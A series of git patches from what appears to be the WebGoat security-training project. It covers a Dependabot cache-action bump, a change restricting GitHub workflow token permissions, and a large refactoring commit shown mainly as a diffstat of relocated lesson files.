+        uses: docker/build-push-action@v2.10.0
         with:
           context: ./docker
           file: docker/Dockerfile

From 56f5b0f0fa788fb1248b0c9e4a89ba144403986d Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Sat, 26 Mar 2022 14:33:06 +0100
Subject: [PATCH 135/227] Bump actions/cache from 2.1.7 to 3 (#1220)

Bumps [actions/cache](https://github.com/actions/cache) from 2.1.7 to 3.
- [Release notes](https://github.com/actions/cache/releases)
- [Commits](https://github.com/actions/cache/compare/v2.1.7...v3)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/branch_build.yml | 4 ++--
 .github/workflows/pr_build.yml     | 2 +-
 .github/workflows/release.yml      | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index d32e3d7f7..36b07f929 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -19,7 +19,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.7
+        uses: actions/cache@v3
         with:
           path: ~/.m2
           key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
@@ -45,7 +45,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.7
+        uses: actions/cache@v3
         with:
           path: ~/.m2
           key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 31c4ed07c..b6c982097 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -36,7 +36,7 @@ jobs:
           java-version: ${{ matrix.java }}
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.7
+        uses: actions/cache@v3
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 8ae5eff1d..b2f134c76 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v2.1.7
+        uses: actions/cache@v3
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}

From f3d8206a0780a4d91f914dd8ad43f4a8e99bef31 Mon Sep 17 00:00:00 2001
From: neilnaveen <42328488+neilnaveen@users.noreply.github.com>
Date: Sat, 9 Apr 2022 05:54:32 -0500
Subject: [PATCH 136/227] Set permissions for GitHub actions (#1228)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

- Included permissions for the action. https://github.com/ossf/scorecard/blob/main/docs/checks.md#token-permissions

https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions

https://docs.github.com/en/actions/using-jobs/assigning-permissions-to-jobs

[Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)

 Restrict the GitHub token permissions only to the required ones; this way, even if the attackers will succeed in compromising your workflow, they won’t be able to do much.

Signed-off-by: neilnaveen <42328488+neilnaveen@users.noreply.github.com>
---
 .github/workflows/branch_build.yml | 3 +++
 .github/workflows/pr_build.yml     | 3 +++
 .github/workflows/release.yml      | 2 ++
 3 files changed, 8 insertions(+)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index 36b07f929..0174d81d4 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -5,6 +5,9 @@ on:
       - main
       - develop
       - release/*
+permissions:
+  contents: read
+
 jobs:
   install-notest:
     if: "github.repository != 'WebGoat/WebGoat'"
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index b6c982097..bfd0d43ea 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -20,6 +20,9 @@ on:
       - 'LICENSE'
       - 'docs/**'
 
+permissions:
+  contents: read
+
 jobs:
   build:
     runs-on: ${{ matrix.os }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index b2f134c76..7f73a10fa 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -104,6 +104,8 @@ jobs:
       - name: "Image digest"
         run: echo ${{ steps.docker_build.outputs.digest }}
   new_version:
+    permissions:
+      contents: write  # for Git to git push
     if: github.repository == 'WebGoat/WebGoat'
     name: Update development version
     needs: [ release ]

From 711649924b16de61d3bcef6fee77597025269a81 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sat, 9 Apr 2022 14:56:12 +0200
Subject: [PATCH 137/227] Refactoring (#1201)

* Some initial refactoring

* Make it one application

* Got it working

* Fix problem on Windows

* Move WebWolf

* Move first lesson

* Moved all lessons

* Fix pom.xml

* Fix tests

* Add option to initialize a lesson

This way we can create content for each user inside a lesson. The initialize method will be called when a new user is created or when a lesson reset happens

* Clean up pom.xml files

* Remove fetching labels based on language.

We only support English at the moment, all the lesson explanations are written in English which makes it very difficult to translate. If we only had labels it would make sense to support multiple languages

* Fix SonarLint issues

* And move it all to the main project

* Fix for documentation paths

* Fix pom warnings

* Remove PMD as it does not work

* Update release notes about refactoring

Update release notes about refactoring

Update release notes about refactoring

* Fix lesson template

* Update release notes

* Keep it in the same repo in Dockerhub

* Update documentation to show how the connection is obtained.

Resolves: #1180

* Rename all integration tests

* Remove command from Dockerfile

* Simplify GitHub actions

Currently, we use a separate actions for pull-requests and branch build.
This is now consolidated in one action.
The PR action triggers always, it now only trigger when the PR is
opened and not in draft.
Running all platforms on a branch build is a bit too much, it is better
 to only run all platforms when someone opens a PR.

* Remove duplicate entry from release notes

* Add explicit registry for base image

* Lesson scanner not working when fat jar

When running the fat jar we have to take into account we
are reading from the jar file and not the filesystem. In
this case you cannot use `getFile` for example.

* added info in README and fixed release docker

* changed base image and added ignore file

Co-authored-by: Zubcevic.com <rene@zubcevic.com>
---
 .dockerignore                                 |    3 +
 .editorconfig                                 |    1 -
 .github/workflows/branch_build.yml            |   57 -
 .github/workflows/build.yml                   |   72 +
 .github/workflows/pr_build.yml                |   48 -
 .github/workflows/release.yml                 |   15 +-
 Dockerfile                                    |   32 +
 README.md                                     |   32 +-
 RELEASE_NOTES.md                              |   16 +-
 config/pmd/pmd-ruleset.xml                    | 1746 -----------------
 docker/Dockerfile                             |   22 -
 docker/Readme.md                              |   13 -
 docker/index.html                             |   70 -
 docker/nginx.conf                             |  140 --
 docker/pom.xml                                |   40 -
 docs/README.md                                |    2 +-
 mvn-debug                                     |    2 +-
 pom.xml                                       |  634 ++++--
 .../webgoat/AccessControlIntegrationTest.java |    9 +-
 .../owasp/webgoat/CSRFIntegrationTest.java    |   37 +-
 .../webgoat/ChallengeIntegrationTest.java     |  112 ++
 .../owasp/webgoat/CryptoIntegrationTest.java  |    8 +-
 .../DeserializationIntegrationTest.java       |   10 +-
 .../webgoat/GeneralLessonIntegrationTest.java |    4 +-
 .../owasp/webgoat/IDORIntegrationTest.java    |    2 +-
 .../org/owasp/webgoat/IntegrationTest.java    |  170 +-
 .../webgoat/JWTLessonIntegrationTest.java     |    6 +-
 .../PasswordResetLessonIntegrationTest.java   |   22 +-
 .../webgoat/PathTraversalIntegrationTest.java |   20 +-
 .../ProgressRaceConditionIntegrationTest.java |    7 +-
 .../owasp/webgoat/SSRFIntegrationTest.java    |    2 +-
 .../webgoat/SeleniumIntegrationTest.java      |   22 +-
 .../SessionManagementIntegrationTest.java     |    2 +-
 .../SqlInjectionAdvancedIntegrationTest.java  |    2 +-
 .../SqlInjectionLessonIntegrationTest.java    |    2 +-
 ...SqlInjectionMitigationIntegrationTest.java |    4 +-
 .../owasp/webgoat/WebWolfIntegrationTest.java |    6 +-
 .../org/owasp/webgoat/XSSIntegrationTest.java |    2 +-
 .../org/owasp/webgoat/XXEIntegrationTest.java |   57 +-
 .../framework/VulnerableTaskHolder.java       |  147 +-
 .../AjaxAuthenticationEntryPoint.java         |    3 +-
 .../AsciiDoctorTemplateResolver.java          |   64 +-
 .../container/DatabaseConfiguration.java      |   68 +
 .../owasp/webgoat/container}/HammerHead.java  |   10 +-
 .../webgoat/container}/LessonDataSource.java  |    4 +-
 .../container}/LessonTemplateResolver.java    |   18 +-
 .../webgoat/container}/MvcConfiguration.java  |  102 +-
 .../org/owasp/webgoat/container}/WebGoat.java |   12 +-
 .../webgoat/container}/WebSecurityConfig.java |    8 +-
 .../webgoat/container/WebWolfRedirect.java    |   21 +
 .../asciidoc/EnvironmentExposure.java         |    2 +-
 .../asciidoc/OperatingSystemMacro.java        |    2 +-
 .../container}/asciidoc/UsernameMacro.java    |    8 +-
 .../asciidoc/WebGoatTmpDirMacro.java          |    2 +-
 .../asciidoc/WebGoatVersionMacro.java         |    2 +-
 .../container}/asciidoc/WebWolfMacro.java     |   10 +-
 .../container}/asciidoc/WebWolfRootMacro.java |    3 +-
 .../assignments/AssignmentEndpoint.java       |   17 +-
 .../assignments/AssignmentHints.java          |    2 +-
 .../assignments/AssignmentPath.java           |    2 +-
 .../container}/assignments/AttackResult.java  |   11 +-
 .../assignments/LessonTrackerInterceptor.java |   12 +-
 .../container}/controller/StartLesson.java    |   40 +-
 .../container}/controller/Welcome.java        |    9 +-
 .../webgoat/container}/i18n/Language.java     |    2 +-
 .../webgoat/container}/i18n/Messages.java     |    2 +-
 .../container}/i18n/PluginMessages.java       |   24 +-
 .../container}/lessons/Assignment.java        |   12 +-
 .../webgoat/container}/lessons/Category.java  |    2 +-
 .../lessons/CourseConfiguration.java          |   16 +-
 .../webgoat/container}/lessons/Hint.java      |    2 +-
 .../container/lessons/Initializeable.java     |   12 +
 .../webgoat/container}/lessons/Lesson.java    |   19 +-
 .../LessonConnectionInvocationHandler.java    |   13 +-
 .../container}/lessons/LessonInfoModel.java   |    2 +-
 .../container}/lessons/LessonMenuItem.java    |    4 +-
 .../lessons/LessonMenuItemType.java           |    2 +-
 .../container/lessons/LessonScanner.java      |   46 +
 .../container/service/EnvironmentService.java |   19 +
 .../container}/service/HintService.java       |   21 +-
 .../container}/service/LabelDebugService.java |   18 +-
 .../container}/service/LabelService.java      |   41 +-
 .../container}/service/LessonInfoService.java |    8 +-
 .../container}/service/LessonMenuService.java |   55 +-
 .../service/LessonProgressService.java        |   59 +
 .../service/LessonTitleService.java           |    6 +-
 .../container}/service/ReportCardService.java |   16 +-
 .../service/RestartLessonService.java         |   15 +-
 .../container}/service/SessionService.java    |    6 +-
 .../webgoat/container}/session/Course.java    |   20 +-
 .../container}/session/LabelDebugger.java     |    4 +-
 .../container}/session/UserSessionData.java   |    2 +-
 .../container}/session/WebSession.java        |   10 +-
 .../container}/users/LessonTracker.java       |   10 +-
 .../users/RegistrationController.java         |    3 +-
 .../webgoat/container}/users/Scoreboard.java  |   45 +-
 .../webgoat/container}/users/UserForm.java    |    2 +-
 .../container}/users/UserRepository.java      |    2 +-
 .../webgoat/container}/users/UserService.java |    7 +-
 .../webgoat/container}/users/UserSession.java |    2 +-
 .../webgoat/container}/users/UserTracker.java |    6 +-
 .../users/UserTrackerRepository.java          |    2 +-
 .../container}/users/UserValidator.java       |    2 +-
 .../webgoat/container}/users/WebGoatUser.java |    9 +-
 .../AccountVerificationHelper.java            |    2 +-
 .../lessons}/auth_bypass/AuthBypass.java      |    6 +-
 .../lessons}/auth_bypass/VerifyAccount.java   |   12 +-
 .../BypassRestrictions.java                   |    6 +-
 .../BypassRestrictionsFieldRestrictions.java  |    6 +-
 .../BypassRestrictionsFrontendValidation.java |    6 +-
 .../lessons}/challenges/ChallengeIntro.java   |    6 +-
 .../webgoat/lessons}/challenges/Email.java    |    4 +-
 .../webgoat/lessons}/challenges/Flag.java     |   12 +-
 .../challenges/SolutionConstants.java         |    2 +-
 .../challenges/challenge1/Assignment1.java    |   10 +-
 .../challenges/challenge1/Challenge1.java     |    6 +-
 .../challenges/challenge1/ImageServlet.java   |   36 +
 .../challenges/challenge5/Assignment5.java    |   11 +-
 .../challenges/challenge5/Challenge5.java     |    6 +-
 .../challenges/challenge7/Assignment7.java    |   15 +-
 .../challenges/challenge7/Challenge7.java     |    6 +-
 .../lessons}/challenges/challenge7/MD5.java   |    4 +-
 .../challenge7/PasswordResetLink.java         |    2 +-
 .../challenges/challenge8/Assignment8.java    |    8 +-
 .../challenges/challenge8/Challenge8.java     |    6 +-
 .../chrome_dev_tools/ChromeDevTools.java      |    6 +-
 .../chrome_dev_tools/NetworkDummy.java        |   10 +-
 .../chrome_dev_tools/NetworkLesson.java       |    8 +-
 .../org/owasp/webgoat/lessons}/cia/CIA.java   |    8 +-
 .../owasp/webgoat/lessons}/cia/CIAQuiz.java   |    6 +-
 .../ClientSideFiltering.java                  |    6 +-
 .../ClientSideFilteringAssignment.java        |    8 +-
 .../ClientSideFilteringFreeAssignment.java    |    8 +-
 .../client_side_filtering/Salaries.java       |    4 +-
 .../client_side_filtering/ShopEndpoint.java   |   13 +-
 .../lessons/cryptography}/CryptoUtil.java     |    4 +-
 .../lessons/cryptography/Cryptography.java    |    8 +-
 .../cryptography}/EncodingAssignment.java     |    6 +-
 .../cryptography}/HashingAssignment.java      |    8 +-
 .../SecureDefaultsAssignment.java             |    8 +-
 .../cryptography}/SigningAssignment.java      |    8 +-
 .../cryptography}/XOREncodingAssignment.java  |    8 +-
 .../org/owasp/webgoat/lessons}/csrf/CSRF.java |    6 +-
 .../lessons}/csrf/CSRFConfirmFlag1.java       |   10 +-
 .../webgoat/lessons}/csrf/CSRFFeedback.java   |   10 +-
 .../webgoat/lessons}/csrf/CSRFGetFlag.java    |    6 +-
 .../webgoat/lessons}/csrf/CSRFLogin.java      |   12 +-
 .../webgoat/lessons}/csrf/ForgedReviews.java  |   12 +-
 .../owasp/webgoat/lessons}/csrf/Review.java   |    2 +-
 .../InsecureDeserialization.java              |    6 +-
 .../InsecureDeserializationTask.java          |   10 +-
 .../deserialization/SerializationHelper.java  |    2 +-
 .../lessons}/hijacksession/HijackSession.java |    6 +-
 .../HijackSessionAssignment.java              |   12 +-
 .../hijacksession/cas/Authentication.java     |    2 +-
 .../cas/AuthenticationProvider.java           |    2 +-
 .../HijackSessionAuthenticationProvider.java  |    2 +-
 .../html_tampering/HtmlTampering.java         |    6 +-
 .../html_tampering/HtmlTamperingTask.java     |    8 +-
 .../lessons}/http_basics/HttpBasics.java      |    6 +-
 .../http_basics/HttpBasicsLesson.java         |    8 +-
 .../lessons}/http_basics/HttpBasicsQuiz.java  |   10 +-
 .../HttpBasicsInterceptRequest.java           |    6 +-
 .../lessons}/http_proxies/HttpProxies.java    |    6 +-
 .../org/owasp/webgoat/lessons}/idor/IDOR.java |    6 +-
 .../lessons}/idor/IDORDiffAttributes.java     |    8 +-
 .../lessons}/idor/IDOREditOtherProfiile.java  |   10 +-
 .../webgoat/lessons}/idor/IDORLogin.java      |   10 +-
 .../lessons}/idor/IDORViewOtherProfile.java   |   10 +-
 .../lessons}/idor/IDORViewOwnProfile.java     |    4 +-
 .../idor/IDORViewOwnProfileAltUrl.java        |   10 +-
 .../webgoat/lessons}/idor/UserProfile.java    |    2 +-
 .../insecure_login/InsecureLogin.java         |    6 +-
 .../insecure_login/InsecureLoginTask.java     |    8 +-
 .../org/owasp/webgoat/lessons}/jwt/JWT.java   |    6 +-
 .../lessons}/jwt/JWTDecodeEndpoint.java       |    6 +-
 .../lessons}/jwt/JWTFinalEndpoint.java        |   10 +-
 .../owasp/webgoat/lessons}/jwt/JWTQuiz.java   |    6 +-
 .../lessons}/jwt/JWTRefreshEndpoint.java      |    8 +-
 .../lessons}/jwt/JWTSecretKeyEndpoint.java    |    8 +-
 .../lessons}/jwt/JWTVotesEndpoint.java        |   12 +-
 .../webgoat/lessons}/jwt/votes/Views.java     |    2 +-
 .../webgoat/lessons}/jwt/votes/Vote.java      |    4 +-
 .../lesson_template}/LessonTemplate.java      |    6 +-
 .../lesson_template}/SampleAttack.java        |   10 +-
 .../lessons}/logging/LogBleedingTask.java     |    6 +-
 .../webgoat/lessons}/logging/LogSpoofing.java |    6 +-
 .../lessons}/logging/LogSpoofingTask.java     |    6 +-
 .../lessons}/missing_ac/DisplayUser.java      |    2 +-
 .../MissingAccessControlUserRepository.java   |    4 +-
 .../missing_ac/MissingFunctionAC.java         |    6 +-
 .../MissingFunctionACHiddenMenus.java         |    8 +-
 .../missing_ac/MissingFunctionACUsers.java    |    8 +-
 .../missing_ac/MissingFunctionACYourHash.java |   10 +-
 .../MissingFunctionACYourHashAdmin.java       |   10 +-
 .../webgoat/lessons}/missing_ac/User.java     |    2 +-
 .../password_reset/PasswordReset.java         |    6 +-
 .../password_reset/PasswordResetEmail.java    |    4 +-
 .../password_reset/QuestionsAssignment.java   |    6 +-
 .../password_reset/ResetLinkAssignment.java   |   14 +-
 .../ResetLinkAssignmentForgotPassword.java    |    6 +-
 .../SecurityQuestionAssignment.java           |    6 +-
 .../password_reset/SimpleMailAssignment.java  |    6 +-
 .../password_reset/TriedQuestions.java        |    2 +-
 .../resetlink/PasswordChangeForm.java         |    2 +-
 .../path_traversal/PathTraversal.java         |    6 +-
 .../path_traversal/ProfileUpload.java         |    8 +-
 .../path_traversal/ProfileUploadBase.java     |   10 +-
 .../path_traversal/ProfileUploadFix.java      |    8 +-
 .../ProfileUploadRemoveUserInput.java         |    8 +-
 .../ProfileUploadRetrieval.java               |   10 +-
 .../path_traversal/ProfileZipSlip.java        |    8 +-
 .../secure_passwords}/SecurePasswords.java    |    6 +-
 .../SecurePasswordsAssignment.java            |    6 +-
 .../lessons}/spoofcookie/SpoofCookie.java     |    6 +-
 .../spoofcookie/SpoofCookieAssignment.java    |    8 +-
 .../lessons}/spoofcookie/encoders/EncDec.java |    2 +-
 .../advanced/SqlInjectionAdvanced.java        |    6 +-
 .../advanced/SqlInjectionChallenge.java       |   10 +-
 .../advanced/SqlInjectionChallengeLogin.java  |   10 +-
 .../advanced/SqlInjectionLesson6a.java        |   14 +-
 .../advanced/SqlInjectionLesson6b.java        |    8 +-
 .../advanced/SqlInjectionQuiz.java            |    6 +-
 .../introduction/SqlInjection.java            |    6 +-
 .../introduction/SqlInjectionLesson10.java    |   10 +-
 .../introduction/SqlInjectionLesson2.java     |   10 +-
 .../introduction/SqlInjectionLesson3.java     |   10 +-
 .../introduction/SqlInjectionLesson4.java     |   10 +-
 .../introduction/SqlInjectionLesson5.java     |   11 +-
 .../introduction/SqlInjectionLesson5a.java    |   12 +-
 .../introduction/SqlInjectionLesson5b.java    |   12 +-
 .../introduction/SqlInjectionLesson8.java     |   10 +-
 .../introduction/SqlInjectionLesson9.java     |   10 +-
 .../sql_injection/mitigation/Servers.java     |   27 +-
 .../mitigation/SqlInjectionLesson10a.java     |    8 +-
 .../mitigation/SqlInjectionLesson10b.java     |    8 +-
 .../mitigation/SqlInjectionLesson13.java      |   12 +-
 .../mitigation/SqlInjectionMitigations.java   |    6 +-
 .../mitigation/SqlOnlyInputValidation.java    |   10 +-
 .../SqlOnlyInputValidationOnKeywords.java     |   10 +-
 .../org/owasp/webgoat/lessons}/ssrf/SSRF.java |    6 +-
 .../webgoat/lessons}/ssrf/SSRFTask1.java      |    8 +-
 .../webgoat/lessons}/ssrf/SSRFTask2.java      |    8 +-
 .../vulnerable_components/Contact.java        |    4 +-
 .../vulnerable_components/ContactImpl.java    |    4 +-
 .../VulnerableComponents.java                 |    6 +-
 .../VulnerableComponentsLesson.java           |   28 +-
 .../WebGoatIntroduction.java                  |    6 +-
 .../lessons}/webwolf_introduction/Email.java  |    4 +-
 .../LandingAssignment.java                    |    8 +-
 .../webwolf_introduction/MailAssignment.java  |    6 +-
 .../WebWolfIntroduction.java                  |    6 +-
 .../owasp/webgoat/lessons}/xss/Comment.java   |    2 +-
 .../lessons}/xss/CrossSiteScripting.java      |    6 +-
 .../xss/CrossSiteScriptingLesson1.java        |    6 +-
 .../xss/CrossSiteScriptingLesson3.java        |    8 +-
 .../xss/CrossSiteScriptingLesson4.java        |    8 +-
 .../xss/CrossSiteScriptingLesson5a.java       |   10 +-
 .../xss/CrossSiteScriptingLesson6a.java       |   10 +-
 .../xss}/CrossSiteScriptingMitigation.java    |    6 +-
 .../lessons}/xss/CrossSiteScriptingQuiz.java  |    6 +-
 .../lessons}/xss/DOMCrossSiteScripting.java   |   10 +-
 .../xss/DOMCrossSiteScriptingVerifier.java    |   12 +-
 .../xss/stored/CrossSiteScriptingStored.java  |    6 +-
 .../StoredCrossSiteScriptingVerifier.java     |   10 +-
 .../xss/stored/StoredXssComments.java         |   14 +-
 .../lessons}/xxe/BlindSendFileAssignment.java |   66 +-
 .../owasp/webgoat/lessons}/xxe/Comment.java   |    2 +-
 .../webgoat/lessons/xxe/CommentsCache.java    |   68 +-
 .../lessons}/xxe/CommentsEndpoint.java        |    4 +-
 .../lessons}/xxe/ContentTypeAssignment.java   |   12 +-
 .../org/owasp/webgoat/lessons}/xxe/Ping.java  |    4 +-
 .../owasp/webgoat/lessons}/xxe/SimpleXXE.java |   16 +-
 .../org/owasp/webgoat/lessons}/xxe/User.java  |    2 +-
 .../org/owasp/webgoat/lessons}/xxe/XXE.java   |    6 +-
 .../owasp/webgoat/server/ParentConfig.java    |   10 +
 .../owasp/webgoat/server/StartWebGoat.java    |   82 +
 .../owasp/webgoat/server/StartupMessage.java  |   33 +
 .../owasp/webgoat}/webwolf/FileServer.java    |   26 +-
 .../webgoat}/webwolf/MvcConfiguration.java    |   23 +-
 .../webgoat}/webwolf/WebSecurityConfig.java   |   14 +-
 .../org/owasp/webgoat/webwolf/WebWolf.java    |   40 +-
 .../webgoat}/webwolf/jwt/JWTController.java   |    8 +-
 .../owasp/webgoat}/webwolf/jwt/JWTToken.java  |    6 +-
 .../owasp/webgoat}/webwolf/mailbox/Email.java |    2 +-
 .../webwolf/mailbox/MailboxController.java    |   16 +-
 .../webwolf/mailbox/MailboxRepository.java    |    2 +-
 .../webwolf/requests/LandingPage.java         |    2 +-
 .../webgoat}/webwolf/requests/Requests.java   |   19 +-
 .../requests/WebWolfTraceRepository.java      |    8 +-
 .../webgoat}/webwolf/user/UserRepository.java |    2 +-
 .../webgoat}/webwolf/user/UserService.java    |    5 +-
 .../webgoat}/webwolf/user/WebGoatUser.java    |    8 +-
 .../resources/application-webgoat.properties  |   20 +-
 .../resources/application-webwolf.properties  |   20 +-
 src/main/resources/banner.txt                 |    6 +
 .../main/resources/db/container/V1__init.sql  |    0
 .../resources/db/container/V2__version.sql    |    0
 .../main/resources/goatkeystore.pkcs12        |  Bin
 .../main/resources/i18n/messages.properties   |    0
 .../resources/i18n/messages_de.properties     |    0
 .../resources/i18n/messages_fr.properties     |    0
 .../resources/i18n/messages_nl.properties     |    0
 .../resources/i18n/messages_ru.properties     |    0
 .../documentation}/2fa-bypass.adoc            |    0
 .../documentation}/bypass-intro.adoc          |    0
 .../documentation}/lesson-template-video.adoc |    0
 .../lessons/auth_bypass}/html/AuthBypass.html |    8 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../images/firefox-proxy-config.png           |  Bin
 .../auth_bypass}/images/paypal-2fa-bypass.png |  Bin
 .../lessons/auth_bypass}/js/bypass.js         |    0
 .../css/bypass-restrictions.css               |    0
 .../BypassRestrictions_FieldRestrictions.adoc |    0
 ...BypassRestrictions_FrontendValidation.adoc |    0
 .../BypassRestrictions_Intro.adoc             |    0
 .../html/BypassRestrictions.html              |    6 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../lessons/challenges}/challenge7/git.zip    |  Bin
 .../lessons/challenges}/css/challenge6.css    |    0
 .../lessons/challenges}/css/challenge8.css    |    0
 .../db/migration/V2018_09_26_1__users.sql     |    0
 .../documentation}/Challenge_1.adoc           |    0
 .../documentation}/Challenge_5.adoc           |    0
 .../documentation}/Challenge_6.adoc           |    0
 .../documentation}/Challenge_7.adoc           |    0
 .../documentation}/Challenge_8.adoc           |    0
 .../Challenge_introduction.adoc               |    0
 .../lessons/challenges/html/Challenge.html    |    9 +
 .../lessons/challenges}/html/Challenge1.html  |    4 +-
 .../lessons/challenges}/html/Challenge5.html  |    4 +-
 .../lessons/challenges}/html/Challenge6.html  |    4 +-
 .../lessons/challenges}/html/Challenge7.html  |    4 +-
 .../lessons/challenges}/html/Challenge8.html  |    4 +-
 .../challenges}/i18n/WebGoatLabels.properties |    0
 .../lessons/challenges}/images/avatar1.png    |  Bin
 .../lessons/challenges}/images/boss.jpg       |  Bin
 .../challenges}/images/challenge1-small.png   |  Bin
 .../lessons/challenges}/images/challenge1.png |  Bin
 .../challenges}/images/challenge2-small.png   |  Bin
 .../lessons/challenges}/images/challenge2.png |  Bin
 .../challenges}/images/challenge3-small.png   |  Bin
 .../lessons/challenges}/images/challenge3.png |  Bin
 .../challenges}/images/challenge4-small.png   |  Bin
 .../lessons/challenges}/images/challenge4.png |  Bin
 .../challenges}/images/challenge5-small.png   |  Bin
 .../lessons/challenges}/images/challenge5.png |  Bin
 .../challenges}/images/hi-five-cat.jpg        |  Bin
 .../lessons/challenges}/images/user1.png      |  Bin
 .../lessons/challenges}/images/user2.png      |  Bin
 .../lessons/challenges}/images/user3.png      |  Bin
 .../lessons/challenges}/images/webgoat2.png   |  Bin
 .../lessons/challenges}/js/bootstrap.min.js   |    0
 .../lessons/challenges}/js/challenge6.js      |    0
 .../lessons/challenges}/js/challenge8.js      |    0
 .../ChromeDevTools_Assignment.adoc            |    0
 .../ChromeDevTools_Assignment_Network.adoc    |    0
 .../ChromeDevTools_console.adoc               |    0
 .../ChromeDevTools_elements.adoc              |    0
 .../documentation}/ChromeDevTools_intro.adoc  |    0
 .../ChromeDevTools_sources.adoc               |    0
 .../html/ChromeDevTools.html                  |   14 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../images/ChromeDev_Console_Clear.jpg        |  Bin
 .../images/ChromeDev_Console_Ex.jpg           |  Bin
 .../images/ChromeDev_Elements.jpg             |  Bin
 .../images/ChromeDev_Elements_CSS.jpg         |  Bin
 .../images/ChromeDev_Network.jpg              |  Bin
 .../images/ChromeDev_Sources.jpg              |  Bin
 .../cia/documentation}/CIA_availability.adoc  |    0
 .../documentation}/CIA_confidentiality.adoc   |    0
 .../cia/documentation}/CIA_integrity.adoc     |    0
 .../lessons/cia/documentation}/CIA_intro.adoc |    0
 .../lessons/cia/documentation}/CIA_quiz.adoc  |    0
 .../main/resources/lessons/cia}/html/CIA.html |   12 +-
 .../cia}/i18n/WebGoatLabels.properties        |    0
 .../lessons/cia}/js/questions_cia.json        |    0
 .../css/clientSideFiltering-stage1.css        |    0
 .../css/clientSideFilteringFree.css           |    0
 .../ClientSideFiltering_assignment.adoc       |    0
 .../ClientSideFiltering_final.adoc            |    0
 .../ClientSideFiltering_plan.adoc             |    0
 .../html/ClientSideFiltering.html             |    6 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../images/lesson1_header.jpg                 |  Bin
 .../images/lesson1_workspace.jpg              |  Bin
 .../images/samsung-black.jpg                  |  Bin
 .../images/samsung-grey.jpg                   |  Bin
 .../js/clientSideFiltering.js                 |    0
 .../js/clientSideFilteringFree.js             |    0
 .../en/ClientSideFiltering.html               |    0
 .../clientside_firebug.jpg                    |  Bin
 .../documentation}/Crypto_plan.adoc           |    0
 .../cryptography/documentation}/defaults.adoc |    0
 .../documentation}/encoding_plan.adoc         |    0
 .../documentation}/encoding_plan2.adoc        |    0
 .../documentation}/encryption.adoc            |    0
 .../documentation}/hashing_plan.adoc          |    0
 .../documentation}/keystores.adoc             |    0
 .../documentation}/postquantum.adoc           |    0
 .../cryptography/documentation}/signing.adoc  |    0
 .../cryptography/html/Cryptography.html       |   20 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../resources/lessons/csrf}/css/reviews.css   |    0
 .../csrf/documentation}/CSRF_Basic_Get-1.adoc |    0
 .../csrf/documentation}/CSRF_ContentType.adoc |    0
 .../csrf/documentation}/CSRF_Frameworks.adoc  |    0
 .../lessons/csrf/documentation}/CSRF_GET.adoc |    0
 .../csrf/documentation}/CSRF_Get_Flag.adoc    |    0
 .../documentation}/CSRF_Impact_Defense.adoc   |    0
 .../csrf/documentation}/CSRF_JSON.adoc        |    0
 .../csrf/documentation}/CSRF_Login.adoc       |    0
 .../csrf/documentation}/CSRF_Reviews.adoc     |    0
 .../csrf/documentation}/CSRF_intro.adoc       |    0
 .../resources/lessons/csrf}/html/CSRF.html    |   22 +-
 .../csrf}/i18n/WebGoatLabels.properties       |    0
 .../lessons/csrf}/images/login-csrf.png       |  Bin
 .../resources/lessons/csrf}/js/csrf-review.js |    0
 .../resources/lessons/csrf}/js/feedback.js    |    0
 .../InsecureDeserialization_GadgetChain.adoc  |    0
 .../InsecureDeserialization_Intro.adoc        |    0
 ...InsecureDeserialization_SimpleExploit.adoc |    0
 .../InsecureDeserialization_Task.adoc         |    0
 .../InsecureDeserialization_WhatIs.adoc       |    0
 .../html/InsecureDeserialization.html         |   10 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../main/resources/lessons}/employees.xml     |    0
 .../HijackSession_content0.adoc               |    0
 .../documentation}/HijackSession_plan.adoc    |    0
 .../hijacksession}/html/HijackSession.html    |    6 +-
 .../i18n/WebGoatLabels.properties             |    0
 .../en/HijackSession_solution.adoc            |    0
 .../lessonSolutions/html/HijackSession.html   |    0
 .../hijacksession}/templates/hijackform.html  |    0
